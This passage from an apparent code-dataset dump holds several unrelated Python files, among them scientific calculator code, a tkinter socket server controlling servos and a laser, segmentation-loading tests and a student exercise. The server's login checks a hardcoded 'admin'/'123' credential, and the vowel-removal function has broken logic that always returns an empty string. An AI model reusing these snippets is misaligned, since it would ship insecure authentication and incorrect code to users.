range(nkpts):\n scf_text += '{:.16f} {:.16f} {:.16f} 1\\n'.format(*list(self.kpts[i, :]))\n elif len(self.kpts) == 3:\n scf_text += \"\"\"\nK_POINTS automatic\n{} {} {} {} {} {}\n\"\"\".format(self.kpts[0], self.kpts[1], self.kpts[2],\n self.koffset[0], self.koffset[1], self.koffset[2])\n \n \n scf_text += structure.save_scf(None, get_text = True)\n\n filename = os.path.join(self.directory, self.label + \".pwi\")\n\n with open(filename, \"w\") as fp:\n fp.write(scf_text)\n \n\n def read_results(self, override_structure = True):\n FileIOCalculator.read_results(self)\n\n\n filename = os.path.join(self.directory, self.label + \".pwo\")\n\n print('READING RESULTS FROM FILE ', filename)\n \n # Settings.all_print(\"reading {}\".format(filename))\n #atm = ase.io.read(filename)\n\n energy = 0\n read_forces = False\n counter = 0\n stress = np.zeros((3,3), dtype = np.double)\n\n read_stress = False\n got_stress = False\n read_structure = override_structure\n read_coords = False\n alat = CC.Units.BOHR_TO_ANGSTROM\n\n # If we read until the stress\n # Everything went correctly, otherwise check for the JOB DONE\n job_done = False\n\n if self.structure is None:\n read_structure = True\n else:\n forces = np.zeros_like(self.structure.coords)\n\n with open(filename, \"r\") as fp:\n for line in fp.readlines():\n line = line.strip()\n data = line.split()\n\n # Avoid white lines\n if not line:\n continue\n \n # Check if the script exited correctly\n if \"JOB DONE\" in line:\n job_done = True\n\n if read_structure:\n new_data = line.replace(\"=\", \" \").split()\n if new_data[0] == \"celldm(1)\":\n alat *= float(new_data[1])\n \n if \"number of atoms/cell\" in line:\n nat = int(data[-1])\n self.structure = CC.Structure.Structure(nat)\n self.structure.has_unit_cell = True\n self.structure.unit_cell = np.eye(3)\n forces = np.zeros_like(self.structure.coords)\n\n if data[0] == \"a(1)\":\n self.structure.unit_cell[0,:] = [float(x) * alat for x in data[3:-1]]\n if data[0] == \"a(2)\":\n self.structure.unit_cell[1,:] = [float(x) * alat for x in data[3:-1]]\n if data[0] == \"a(3)\":\n self.structure.unit_cell[2,:] = [float(x) * alat for x in data[3:-1]]\n \n if \"Cartesian axes\" in line:\n read_coords = True\n\n\n if read_coords:\n # Improve the split of the line to avoid merging numbers\n data = line.replace(\"-\", \" -\").replace(\"(\", \"( \").split()\n if len(data) == 10:\n i_atm = int(data[0]) - 1\n self.structure.coords[i_atm, :] = [float(x) * alat for x in data[6:9]]\n self.structure.atoms[i_atm] = data[1]\n if i_atm == self.structure.N_atoms - 1:\n read_coords = False\n read_structure = False\n continue\n\n\n\n if line[0] == \"!\":\n energy = float(data[4])\n\n if \"Forces acting on atoms\" in line:\n read_forces = True\n read_stress = False\n continue\n \n if \"total stress\" in line:\n read_stress = True\n read_forces = False\n counter = 0\n continue\n \n if read_forces and len(data) == 9:\n if data[0] == \"atom\":\n counter += 1\n\n at_index = int(data[1]) - 1\n forces[at_index, :] = [float(x) for x in data[6:]]\n \n if counter >= self.structure.N_atoms:\n read_forces = False\n \n if read_stress and len(data) == 6:\n stress[counter, :] = [float(x) for x in data[:3]]\n counter += 1\n if counter == 3:\n got_stress = True\n read_stress = False\n\n \n # Convert to match ASE conventions\n energy *= CC.Units.RY_TO_EV\n forces *= CC.Units.RY_TO_EV / CC.Units.BOHR_TO_ANGSTROM\n stress *= CC.Units.RY_PER_BOHR3_TO_EV_PER_A3\n stress = CC.Methods.transform_voigt(stress) # To be consistent with ASE, use voigt notation\n \n print('READING RESULTS : energy = {} | job done = {}'.format(energy, job_done))\n\n # Everything went on correctly, update the results\n if job_done or got_stress:\n self.results = {\"energy\" : energy, \"forces\" : forces}\n if got_stress:\n # Use voit\n self.results.update({\"stress\" : - stress})\n else:\n self.results = None\n \n\n \n\n# Here the methods to minimize the structure with a standard calculator\nclass Relax:\n def __init__(self, structure, calculator, method = \"BFGS\", verbose = True, store_trajectory = True):\n \"\"\"\n Class that perform the structure relaxation.\n\n Parameters\n ----------\n structure : CC.Structure.Structure()\n The atomic structure\n calculator : CC.calculators.Calculator()\n The CellConstructor (or ASE) calculator.\n method : string\n The algorithm for the minimization. Default BFGS\n verbose : bool\n If true, prints the current total energy and forces\n store_trajector : bool\n If true, the trajectory of the minimization is saved in self.trajectory\n \"\"\"\n self.structure = structure\n self.calculator = calculator\n self.method = method\n self.verbose = verbose\n self.store_trajectory = store_trajectory\n\n self.trajectory = []\n\n # Usefull variables to track the energy and add a callback\n self.last_eval = None\n self.last_energy = None\n self.last_force = None\n self.iterations = 1\n\n \n def static_relax(self, **kwargs):\n \"\"\"\n RELAX THE STRUCTURE\n -------------------\n\n Relax the structure keeping fixed the lattice parameters using a BFGS algorithm.\n\n Parameters\n ----------\n **kwargs : \n Any optional arguments of scipy.optimize.minimize to control\n the minimization.\n\n Results\n -------\n optimized_structure : CC.Structure.Structure()\n The structure after the optimization\n \"\"\"\n\n if \"method\" in kwargs:\n self.method = kwargs[\"method\"]\n\n\n # Parse the function to match the scipy minimizer\n self.last_eval = np.zeros(self.structure.coords.ravel().shape, dtype = np.double)\n self.last_energy = 0\n self.last_force = np.zeros_like(self.last_eval)\n\n def func(x):\n if np.linalg.norm(x - self.last_eval) < 1e-16:\n return self.last_energy, self.last_force\n\n struct = self.structure.copy()\n struct.coords[:,:] = x.reshape(struct.coords.shape)\n\n energy, forces = get_energy_forces(self.calculator, struct)\n\n self.last_eval[:] = x.copy()\n self.last_energy = energy\n self.last_force[:] = -forces.ravel().copy()\n\n\n return energy, -forces.ravel()\n\n def callback(xk):\n \n if self.verbose:\n energy, force = func(xk)\n #print('it:', self.iterations)\n #print('energy:', energy)\n #print('force:', force)\n print(\"{:5d}) {:16.8f} eV {:16.8f} eV/A\".format(self.iterations, energy, np.linalg.norm(force)))\n self.iterations += 1\n \n if self.store_trajectory:\n struc = self.structure.copy()\n struc.coords[:,:] = xk.reshape(struc.coords.shape)\n self.trajectory.append(struc)\n\n if self.verbose:\n print(\"STATIC STRUCTURE RELAX\")\n print()\n print(\"{:5s} {:16s} {:16s} \".format(\"ITERS\", \"ENERGY\", \"FORCE GRAD\"))\n print(\"--------------------------------------------------\")\n\n \n res = scipy.optimize.minimize(func, self.structure.coords.ravel(), method = self.method, jac = True, callback = callback, **kwargs)\n\n if self.verbose:\n print()\n\n final_struct = self.structure.copy()\n final_struct.coords[:,:] = res.x.reshape(final_struct.coords.shape)\n self.structure = final_struct\n\n return final_struct\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"SSCHAcode/CellConstructor","sub_path":"cellconstructor/calculators.py","file_name":"calculators.py","file_ext":"py","file_size_in_byte":17679,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"32507066070","text":"''' \nWrite a script that uses the API running on `localhost:8080` to build out datasets with a similar specification as `splitter.py`. Only consume data from the API that are from NY and NJ and have a sqft greater than or equal to 30000 to build your datasets. The directory specifications should be the same as in `splitter.py`.\n'''\n\nimport os \nimport pathlib\nfrom utils_data_manipulation import fetch_data, pydantic_converter_of, sort, list_of_agencies_in, categorize\nfrom utils_IO_bound import api_splitter\nfrom schemas import FakeEnergyFacilityModel\nfrom itertools import chain\n\nthis_dir = os.path.dirname(os.path.realpath(__file__)) \n\n\ndef main():\n dir_filepath = pathlib.Path(this_dir) / 'project_data' / 'api_splitter'\n list_of_states, sqft_gte_param = ['NY','NJ'], 30000\n url = 'http://localhost:8080' + '/data/'\n list_of_datasets = [fetch_data(url, address_contains=state, sqft_gte=sqft_gte_param) for state in list_of_states]\n dataset = list(chain.from_iterable(list_of_datasets))\n list_of_inst_models = pydantic_converter_of(dataset, FakeEnergyFacilityModel)\n list_of_sorted_inst_models = sort(list_of_inst_models, 'facility_id')\n list_of_agencies = list_of_agencies_in(list_of_sorted_inst_models)\n categorized_dataset = categorize(list_of_sorted_inst_models, 'address', list_of_states) \n if not dir_filepath.exists():\n dir_filepath.mkdir()\n api_splitter('json', list_of_agencies, categorized_dataset, dir_filepath) \n\n\nif __name__ == '__main__': \n main() \n","repo_name":"zombie1864/data_IO_aggregation","sub_path":"src/api_splitter.py","file_name":"api_splitter.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32896370772","text":"''' calculates the expected values of different rolls. 0 represents no dice rolled again, 1 represents 1 dice rolled again\r\n2 represents pair of 2 dice rolled again and 3 represents all dice rolled again. The method returns the expected value of\r\nall possible combinations and corresponding dices which were rolled again'''\r\ndef roll_dice(no_of_dice_to_roll, roll):\r\n sampespcae = [1, 2, 3, 4, 5, 6]\r\n final = []\r\n if no_of_dice_to_roll == 0:\r\n return [[calc_points(roll), '0']]\r\n\r\n elif no_of_dice_to_roll == 1:\r\n for i in range(3):\r\n expect = 0\r\n temp = roll.copy()\r\n temp.pop(i)\r\n for j in range(6):\r\n expect += calc_points(list(temp + [sampespcae[j]]))*(1/6)\r\n final += [[expect, str(i + 1)]]\r\n return final\r\n\r\n elif no_of_dice_to_roll == 2:\r\n for i in range(3):\r\n for j in range(i, 3):\r\n if i == j:\r\n continue\r\n expect = 0\r\n temp = roll.copy()\r\n temp.pop(i)\r\n temp.pop(j-1)\r\n for k in range(6):\r\n for l in range(6):\r\n expect += calc_points(list(temp + [sampespcae[k]] + [sampespcae[l]])) * (1 / 36)\r\n\r\n final += [[expect, str(i+1) + \" \" + str(j + 1)]]\r\n return final\r\n\r\n elif no_of_dice_to_roll == 3:\r\n expect = 0\r\n for i in range(6):\r\n for j in range(6):\r\n for k in range(6):\r\n temp = [sampespcae[i], sampespcae[j], sampespcae[k]]\r\n expect += calc_points(temp)*(1/216)\r\n return [[expect, \"1 2 3\"]]\r\n\r\n'''calculates no of points of any given rolls'''\r\ndef calc_points(roll):\r\n if(roll[0] == roll[1] == roll[2]):\r\n return 25\r\n else:\r\n return sum(roll)\r\n\r\n'''returns the most favourable move for a given sequence of rolls'''\r\ndef solve(roll):\r\n chance = []\r\n for i in range(4):\r\n chance += roll_dice(i, roll)\r\n return max(chance)\r\n\r\n\r\ndice1 = int(input(\"What is Roll on Dice 1? \")) #input for dice 1\r\ndice2 = int(input(\"What is Roll on Dice 2? \")) #input for dice 1\r\ndice3 = int(input(\"What is Roll on Dice 3? \")) #input for dice 1\r\nroll = [dice1,dice2,dice3]\r\nmove = solve(roll)\r\nprint(\"Roll Dice(s) No.: \" + move[1])","repo_name":"aayushshah2293/ElementsOfAI","sub_path":"GameOfChance - ExpectiMiniMax/GameOfChance.py","file_name":"GameOfChance.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72052607092","text":"from website import create_app, db\n#from flask import render_template\n\napp = create_app()\ndb.create_all(app=create_app())\n\n\n\"\"\"@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db.session.remove()\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404\n\n@app.errorhandler(Exception)\ndef handle_exception(e):\n print(e)\n return render_template(\"500.html\"), 500\"\"\"\n\nif __name__ == \"__main__\" :\n\n app.run(debug=True)\n","repo_name":"jun3d4y/Self-Hosted-Notes-Web-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30596528370","text":"# !/usr/bin/python3\r\n# -*- coding:utf-8 -*-\r\n# _*_ coding:cp1254 _*_\r\n#Ahmed Demirezen\r\n\r\n#importing library\r\nimport socket\r\nimport tkinter as tk\r\n\r\n#this step was assing server variable\r\nserver=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n\r\nclass login_panel:\r\n def __init__(self,screen):\r\n self.control_unit=0\r\n self.control_unit_4panel=0\r\n\r\n frame=tk.Frame(screen)\r\n frame.pack()\r\n \r\n self.l1=tk.Label(frame,text=\"User Id:\")\r\n self.l1.grid(row=0,column=0)\r\n \r\n self.e1=tk.Entry(frame)\r\n self.e1.grid(row=0,column=1)\r\n\r\n self.l2=tk.Label(frame,text=\"Pass:\")\r\n self.l2.grid(row=1,column=0)\r\n\r\n self.e2=tk.Entry(frame)\r\n self.e2.grid(row=1,column=1)\r\n\r\n self.b1=tk.Button(frame,text=\"Ok\",command=self.control,padx=10,pady=2)\r\n self.b1.grid(row=3,column=0)\r\n\r\n self.l3=tk.Label(frame)\r\n self.l3.grid(row=4,column=0)\r\n def control(self):#username and password are checked\r\n if (self.e1.get()==\"admin\" and self.e2.get()==\"123\"):\r\n print(\"\\nlogin succes\")\r\n self.control_unit=1\r\n window.destroy()\r\n else:\r\n self.l3[\"text\"]=\"username or password is wrong !!!\"\r\n print(\"\\nusername or password is wrong !!!\")\r\n\r\nclass connection:#ip and port settings \r\n def __init__(self,screen_1):\r\n self.control_unit_1=0\r\n \r\n frame=tk.Frame(screen_1)\r\n frame.pack()\r\n\r\n self.l3=tk.Label(frame,text=\"Ip|Port:\")\r\n self.l3.grid(row=0,column=0)\r\n\r\n self.l1=tk.Label(frame,text=\"Host Ip:\")\r\n self.l1.grid(row=1,column=0)\r\n\r\n self.e1=tk.Entry(frame)\r\n self.e1.grid(row=1,column=1)\r\n\r\n self.l2=tk.Label(frame,text=\"Port:\")\r\n self.l2.grid(row=2,column=0)\r\n\r\n self.e2=tk.Entry(frame)\r\n self.e2.grid(row=2,column=1)\r\n\r\n self.b1=tk.Button(frame,text=\"Ok\",padx=10,pady=2,command=self.server_c)\r\n self.b1.grid(row=3,column=0)\r\n\r\n self.b2=tk.Button(frame,text=\"Test\",padx=10,pady=2,command=self.ip_port)\r\n self.b2.grid(row=3,column=1)\r\n\r\n def ip_port(self):\r\n self.l3[\"text\"]=\"Ip|Port:\",self.e1.get(),\"|\",self.e2.get()\r\n\r\n def server_c(self):\r\n try:\r\n self.host=self.e1.get()\r\n self.port=int(self.e2.get())\r\n\r\n server.bind((self.host,self.port))\r\n\r\n window_2.destroy()\r\n except ValueError:\r\n self.l3[\"text\"]=\"ValueError Please Enter the Number\"\r\n \r\n\r\nclass control_panel:#main window\r\n def __init__(self,screen_2):\r\n\r\n self.laser_bool=False\r\n\r\n frame_1=tk.Frame(screen_2)\r\n frame_1.place(x=0,y=0)\r\n\r\n frame_2=tk.Frame(screen_2)\r\n frame_2.place(x=0,y=150)\r\n \r\n frame_2.focus_set()\r\n frame_2.bind(\"\",self.c_w_kb)#for the keyboard control\r\n\r\n self.s1=tk.Scale(frame_1,from_=10,to =0, orient=\"vertical\",command=self.scale_v)#vertical control scale\r\n self.s1.grid(row=0,column=0)\r\n\r\n self.s1.set(5)\r\n\r\n self.s2=tk.Scale(frame_1,from_=10,to =0, orient=\"horizontal\",command=self.scale_h)#horizontal control scale\r\n self.s2.grid(row=0,column=1)\r\n\r\n self.s2.set(5)\r\n\r\n self.l1=tk.Label(frame_2,text=\"Control with W A S D\")\r\n self.l1.grid(row=0,column=0)\r\n\r\n self.s3=tk.Scale(frame_2,from_=0,to=1,orient=\"horizontal\",command=self.laser)#laser control scale\r\n self.s3.grid(row=1,column=0)\r\n\r\n self.l2=tk.Label(frame_2,text=\"Laser\")\r\n self.l2.grid(row=1,column=1)\r\n\r\n self.b2=tk.Button(frame_1,text=(\"Close the Client\"),command=self.c_t_c)#close button\r\n self.b2.grid(row=0,column=3)\r\n\r\n self.scale_l=0\r\n \r\n def scale_v(self,angle):\r\n print(\"V \",self.s1.get())\r\n message=\"V \"+str(self.s1.get())\r\n addr.send(message.encode())\r\n\r\n def scale_h(self,angle):\r\n print(\"H \",self.s2.get())\r\n message=\"H \"+str(self.s2.get())\r\n addr.send(message.encode())\r\n\r\n def c_t_c(self):#close the client\r\n addr.send(\"close\".encode())\r\n \r\n def laser(self,angle): \r\n self.laser_m=\"laser\"+str(self.s3.get())\r\n addr.send(self.laser_m.encode())\r\n \r\n def c_w_kb(self,event):#control with keyboard\r\n self.scale_l=self.s1.get()\r\n self.scale_2=self.s2.get()\r\n \r\n \r\n \r\n if event.char==\"s\" or event.char==\"S\":\r\n if int(self.scale_l)==0:\r\n pass\r\n else:\r\n self.scale_l=self.scale_l-1\r\n self.s1.set(int(self.scale_l))\r\n message=\"V \"+str(self.s1.get())\r\n addr.send(message.encode())\r\n print(\"V \",self.s1.get())\r\n \r\n\r\n elif event.char==\"w\" or event.char==\"W\":\r\n if int(self.scale_l)==10:\r\n pass\r\n else:\r\n self.scale_l=self.scale_l+1\r\n self.s1.set(int(self.scale_l))\r\n message=\"V \"+str(self.s1.get())\r\n addr.send(message.encode())\r\n print(\"V \",self.s1.get())\r\n \r\n\r\n elif event.char==\"d\" or event.char==\"D\": \r\n if int(self.scale_2)==0:\r\n pass\r\n else:\r\n self.scale_2=self.scale_2-1\r\n self.s2.set(int(self.scale_2))\r\n message=\"H \"+str(self.s2.get())\r\n addr.send(message.encode())\r\n print(\"H \",self.s2.get())\r\n \r\n\r\n elif event.char==\"a\" or event.char==\"A\":\r\n if int(self.scale_2)==10:\r\n pass\r\n else:\r\n self.scale_2=self.scale_2+1\r\n self.s2.set(int(self.scale_2))\r\n message=\"H \"+str(self.s2.get())\r\n addr.send(message.encode())\r\n print(\"H \",self.s2.get())\r\n\r\n elif event.char==\"l\" or event.char==\"L\":\r\n \r\n if self.laser_bool==False:\r\n self.laser_bool=True\r\n self.s3.set(1)\r\n addr.send(\"laser1\".encode())\r\n elif self.laser_bool==True:\r\n self.laser_bool=False\r\n self.s3.set(0)\r\n addr.send(\"laser0\".encode())\r\n \r\n \r\n###Windows \r\nwindow=tk.Tk()\r\nwindow.geometry(\"300x100\")\r\nwindow.title(\"Login Panel\")\r\nlogin_screen=login_panel(window)\r\nwindow.mainloop()\r\n#\r\nwindow_2=tk.Tk()\r\nwindow_2.geometry(\"300x100\")\r\nwindow_2.title(\"Connection\")\r\nif (login_screen.control_unit == 1):\r\n \r\n login_screen_2=connection(window_2)\r\n login_screen_2.control_unit_1=1\r\n login_screen.control_unit_4panel=1\r\nelse:\r\n window_2.destroy()\r\nwindow_2.mainloop()\r\n##Server \r\nserver.listen(1)\r\nprint(\"connection is waiting\")\r\naddr,ip = server.accept()\r\nprint(\"connection is succes\\nConnecnted ip:\",ip,addr)\r\naddr.send(\"command\".encode())\r\n##\r\n#\r\nwindow_3=tk.Tk()\r\nwindow_3.title(\"Control Panel\")\r\nwindow_3.geometry(\"300x300\")\r\ntry: \r\n if (login_screen_2.control_unit_1==1):\r\n login_screen_3=control_panel(window_3)\r\n else:\r\n window_3.destroy()\r\nexcept NameError:\r\n if (login_screen.control_unit_4panel==1):\r\n login_screen_3=control_panel(window_3)\r\n else:\r\n window_3.destroy()\r\nwindow_3.mainloop()\r\n#\r\n###\r\n","repo_name":"ahmeddemirezen/eagle-vision","sub_path":"eagle_vision_edited/server_v1.py","file_name":"server_v1.py","file_ext":"py","file_size_in_byte":7466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15192028253","text":"import copy\nimport os.path as osp\nimport tempfile\n\nimport mmcv\nimport numpy as np\nfrom mmcv.transforms import LoadImageFromFile\n\nfrom mmseg.datasets.transforms import (LoadAnnotations,\n LoadBiomedicalAnnotation,\n LoadBiomedicalData,\n LoadBiomedicalImageFromFile,\n LoadImageFromNDArray)\n\n\nclass TestLoading:\n\n @classmethod\n def setup_class(cls):\n cls.data_prefix = osp.join(osp.dirname(__file__), '../data')\n\n def test_load_img(self):\n results = dict(img_path=osp.join(self.data_prefix, 'color.jpg'))\n transform = LoadImageFromFile()\n results = transform(copy.deepcopy(results))\n assert results['img_path'] == osp.join(self.data_prefix, 'color.jpg')\n assert results['img'].shape == (288, 512, 3)\n assert results['img'].dtype == np.uint8\n assert results['ori_shape'] == results['img'].shape[:2]\n assert repr(transform) == transform.__class__.__name__ + \\\n \"(ignore_empty=False, to_float32=False, color_type='color',\" + \\\n \" imdecode_backend='cv2', file_client_args={'backend': 'disk'})\"\n\n # to_float32\n transform = LoadImageFromFile(to_float32=True)\n results = transform(copy.deepcopy(results))\n assert results['img'].dtype == np.float32\n\n # gray image\n results = dict(img_path=osp.join(self.data_prefix, 'gray.jpg'))\n transform = LoadImageFromFile()\n results = transform(copy.deepcopy(results))\n assert results['img'].shape == (288, 512, 3)\n assert results['img'].dtype == np.uint8\n\n transform = LoadImageFromFile(color_type='unchanged')\n results = transform(copy.deepcopy(results))\n assert results['img'].shape == (288, 512)\n assert results['img'].dtype == np.uint8\n\n def test_load_seg(self):\n seg_path = osp.join(self.data_prefix, 'seg.png')\n results = dict(\n seg_map_path=seg_path, reduce_zero_label=True, seg_fields=[])\n transform = LoadAnnotations()\n results = transform(copy.deepcopy(results))\n assert results['gt_seg_map'].shape == (288, 512)\n assert results['gt_seg_map'].dtype == np.uint8\n assert repr(transform) == transform.__class__.__name__ + \\\n \"(reduce_zero_label=True,imdecode_backend='pillow')\" + \\\n \"file_client_args={'backend': 'disk'})\"\n\n # reduce_zero_label\n transform = LoadAnnotations(reduce_zero_label=True)\n results = transform(copy.deepcopy(results))\n assert results['gt_seg_map'].shape == (288, 512)\n assert results['gt_seg_map'].dtype == np.uint8\n\n def test_load_seg_custom_classes(self):\n\n test_img = np.random.rand(10, 10)\n test_gt = np.zeros_like(test_img)\n test_gt[2:4, 2:4] = 1\n test_gt[2:4, 6:8] = 2\n test_gt[6:8, 2:4] = 3\n test_gt[6:8, 6:8] = 4\n\n tmp_dir = tempfile.TemporaryDirectory()\n img_path = osp.join(tmp_dir.name, 'img.jpg')\n gt_path = osp.join(tmp_dir.name, 'gt.png')\n\n mmcv.imwrite(test_img, img_path)\n mmcv.imwrite(test_gt, gt_path)\n\n # test only train with label with id 3\n results = dict(\n img_path=img_path,\n seg_map_path=gt_path,\n label_map={\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 1,\n 4: 0\n },\n reduce_zero_label=False,\n seg_fields=[])\n\n load_imgs = LoadImageFromFile()\n results = load_imgs(copy.deepcopy(results))\n\n load_anns = LoadAnnotations()\n results = load_anns(copy.deepcopy(results))\n\n gt_array = results['gt_seg_map']\n\n true_mask = np.zeros_like(gt_array)\n true_mask[6:8, 2:4] = 1\n\n assert results['seg_fields'] == ['gt_seg_map']\n assert gt_array.shape == (10, 10)\n assert gt_array.dtype == np.uint8\n np.testing.assert_array_equal(gt_array, true_mask)\n\n # test only train with label with id 4 and 3\n results = dict(\n img_path=osp.join(self.data_prefix, 'color.jpg'),\n seg_map_path=gt_path,\n label_map={\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 2,\n 4: 1\n },\n reduce_zero_label=False,\n seg_fields=[])\n\n load_imgs = LoadImageFromFile()\n results = load_imgs(copy.deepcopy(results))\n\n load_anns = LoadAnnotations()\n results = load_anns(copy.deepcopy(results))\n\n gt_array = results['gt_seg_map']\n\n true_mask = np.zeros_like(gt_array)\n true_mask[6:8, 2:4] = 2\n true_mask[6:8, 6:8] = 1\n\n assert results['seg_fields'] == ['gt_seg_map']\n assert gt_array.shape == (10, 10)\n assert gt_array.dtype == np.uint8\n np.testing.assert_array_equal(gt_array, true_mask)\n\n # test no custom classes\n results = dict(\n img_path=img_path,\n seg_map_path=gt_path,\n reduce_zero_label=False,\n seg_fields=[])\n\n load_imgs = LoadImageFromFile()\n results = load_imgs(copy.deepcopy(results))\n\n load_anns = LoadAnnotations()\n results = load_anns(copy.deepcopy(results))\n\n gt_array = results['gt_seg_map']\n\n assert results['seg_fields'] == ['gt_seg_map']\n assert gt_array.shape == (10, 10)\n assert gt_array.dtype == np.uint8\n np.testing.assert_array_equal(gt_array, test_gt)\n\n tmp_dir.cleanup()\n\n def test_load_image_from_ndarray(self):\n results = {'img': np.zeros((256, 256, 3), dtype=np.uint8)}\n transform = LoadImageFromNDArray()\n results = transform(results)\n\n assert results['img'].shape == (256, 256, 3)\n assert results['img'].dtype == np.uint8\n assert results['img_shape'] == (256, 256)\n assert results['ori_shape'] == (256, 256)\n\n # to_float32\n transform = LoadImageFromNDArray(to_float32=True)\n results = transform(copy.deepcopy(results))\n assert results['img'].dtype == np.float32\n\n # test repr\n transform = LoadImageFromNDArray()\n assert repr(transform) == ('LoadImageFromNDArray('\n 'ignore_empty=False, '\n 'to_float32=False, '\n \"color_type='color', \"\n \"imdecode_backend='cv2', \"\n \"file_client_args={'backend': 'disk'})\")\n\n def test_load_biomedical_img(self):\n results = dict(\n img_path=osp.join(self.data_prefix, 'biomedical.nii.gz'))\n transform = LoadBiomedicalImageFromFile()\n results = transform(copy.deepcopy(results))\n assert results['img_path'] == osp.join(self.data_prefix,\n 'biomedical.nii.gz')\n assert len(results['img'].shape) == 4\n assert results['img'].dtype == np.float32\n assert results['ori_shape'] == results['img'].shape[1:]\n assert repr(transform) == ('LoadBiomedicalImageFromFile('\n \"decode_backend='nifti', \"\n 'to_xyz=False, '\n 'to_float32=True, '\n \"file_client_args={'backend': 'disk'})\")\n\n def test_load_biomedical_annotation(self):\n results = dict(\n seg_map_path=osp.join(self.data_prefix, 'biomedical_ann.nii.gz'))\n transform = LoadBiomedicalAnnotation()\n results = transform(copy.deepcopy(results))\n assert len(results['gt_seg_map'].shape) == 3\n assert results['gt_seg_map'].dtype == np.float32\n\n def test_load_biomedical_data(self):\n input_results = dict(\n img_path=osp.join(self.data_prefix, 'biomedical.npy'))\n transform = LoadBiomedicalData(with_seg=True)\n results = transform(copy.deepcopy(input_results))\n assert results['img_path'] == osp.join(self.data_prefix,\n 'biomedical.npy')\n assert results['img'][0].shape == results['gt_seg_map'].shape\n assert results['img'].dtype == np.float32\n assert results['ori_shape'] == results['img'].shape[1:]\n assert repr(transform) == ('LoadBiomedicalData('\n 'with_seg=True, '\n \"decode_backend='numpy', \"\n 'to_xyz=False, '\n \"file_client_args={'backend': 'disk'})\")\n\n transform = LoadBiomedicalData(with_seg=False)\n results = transform(copy.deepcopy(input_results))\n assert len(results['img'].shape) == 4\n assert results.get('gt_seg_map') is None\n assert repr(transform) == ('LoadBiomedicalData('\n 'with_seg=False, '\n \"decode_backend='numpy', \"\n 'to_xyz=False, '\n \"file_client_args={'backend': 'disk'})\")\n","repo_name":"gongyan1/LIA-CAM","sub_path":"tests/test_datasets/test_loading.py","file_name":"test_loading.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42745006925","text":"def remove_vogais(texto):\n novo = ''\n for i in texto:\n if not i == 'a' and i == 'e' and i == 'i' and i == 'o' and i == 'u':\n novo += i\n return novo\n\npal = 'abacate'\n\nprint(remove_vogais(pal))","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_106/ch73_2020_07_28_04_24_37_860503.py","file_name":"ch73_2020_07_28_04_24_37_860503.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41115789591","text":"\nimport random\nimport numpy as np\nimport torch.utils.data as data\nfrom PIL import Image\nimport torchvision.transforms as transforms\nfrom abc import ABC, abstractmethod\n\n\nclass BaseDataset(data.Dataset, ABC):\n\n\n def __init__(self, opt):\n\n self.opt = opt\n self.root = opt.dataroot\n\n @staticmethod\n def modify_commandline_options(parser, is_train):\n\n return parser\n\n @abstractmethod\n def __len__(self):\n return 0\n\n @abstractmethod\n def __getitem__(self, index):\n\n pass\n\n\ndef get_params(opt, size):\n w, h = size\n new_h = h\n new_w = w\n if opt.preprocess == 'resize_and_crop':\n new_h = new_w = opt.load_size\n elif opt.preprocess == 'scale_width_and_crop':\n new_w = opt.load_size\n new_h = opt.load_size * h // w\n\n x = random.randint(0, np.maximum(0, new_w - opt.crop_size))\n y = random.randint(0, np.maximum(0, new_h - opt.crop_size))\n\n vflip = random.random() > 0.5\n hflip = random.random() > 0.5\n\n return {'crop_pos': (x, y), 'vflip': vflip, 'hflip': hflip}\n\n\ndef get_transform(opt, params=None, grayscale=False, method=Image.BICUBIC, convert=True):\n transform_list = []\n if grayscale:\n transform_list.append(transforms.Grayscale(1))\n if 'resize' in opt.preprocess:\n osize = [opt.load_size, opt.load_size]\n transform_list.append(transforms.Resize(osize, method))\n elif 'scale_width' in opt.preprocess:\n transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, method)))\n\n if 'crop' in opt.preprocess:\n if params is None:\n transform_list.append(transforms.RandomCrop(opt.crop_size))\n else:\n transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size)))\n\n if opt.preprocess == 'none':\n transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=4, method=method)))\n\n if not opt.no_flip:\n if params is None:\n transform_list.append(transforms.RandomHorizontalFlip())\n else:\n if params['hflip']:\n transform_list.append(transforms.Lambda(lambda img: __hflip(img, params['hflip'])))\n if params['vflip']:\n transform_list.append(transforms.Lambda(lambda img: __vflip(img, params['vflip'])))\n\n if convert:\n transform_list += [transforms.ToTensor()]\n if grayscale:\n transform_list += [transforms.Normalize((0.5,), (0.5,))]\n else:\n # pass\n transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)\n\n\ndef __make_power_2(img, base, method=Image.BICUBIC):\n ow, oh = img.size\n h = int(round(oh / base) * base)\n w = int(round(ow / base) * base)\n if (h == oh) and (w == ow):\n return img\n\n __print_size_warning(ow, oh, w, h)\n return img.resize((w, h), method)\n\n\ndef __scale_width(img, target_width, method=Image.BICUBIC):\n ow, oh = img.size\n if (ow == target_width):\n return img\n w = target_width\n h = int(target_width * oh / ow)\n return img.resize((w, h), method)\n\n\ndef __crop(img, pos, size):\n ow, oh = img.size\n 